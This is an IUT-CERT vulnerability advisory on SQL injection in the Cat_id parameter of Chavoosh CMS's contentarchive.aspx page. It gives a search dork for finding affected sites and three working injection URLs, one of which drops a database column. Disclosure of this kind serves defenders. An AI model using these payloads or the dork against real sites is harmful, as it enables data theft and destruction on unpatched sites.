Chavoosh CMS suffers from a remote SQL injection vulnerability.
5d8b0d5eabab77269e7db713b44de77861e2b73ac20e3557c77c7855831cb827
================= IUT-CERT =================
Title: Chavoosh CMS SQL Injection Vulnerability
Vendor: www.chavoosh.com
Dork: Design by chavoosh Co
Type: Input.Validation.Vulnerability (SQL Injection)
Fix: N/A
================== nsec.ir =================
Description:
------------------
Chavoosh is a CMS producer in Iran. contentarchive.aspx page in Chavoosh CMS
product is vulnerable to SQL Injection vulnerability.
Vulnerability Variant:
------------------
URI Injection "/contentarchive.aspx" in "Cat_id" parameter.
http://example.com/content/contentarchive.aspx?Cat_id=82+UNION+SELECT+ @@version&Landir=rtl&Lan=Fa
http://example.com/content/contentarchive.aspx?Cat_id=82+HAVING+1=1 &Landir=rtl&Lan=Fa
http://example.com/content/contentarchive.aspx?Cat_id=82+ALTER+TABLE+contentcategory+DROP+COLUMN+category_name&Landir=rtl&Lan=Fa
Solution:
------------------
Input validation of Parameter "Cat_id" should be corrected.
Credit:
------------------
Isfahan University of Technology - Computer Emergency Response Team
Thanks to : E. Jafari, N. Fathi, M. R. Faghani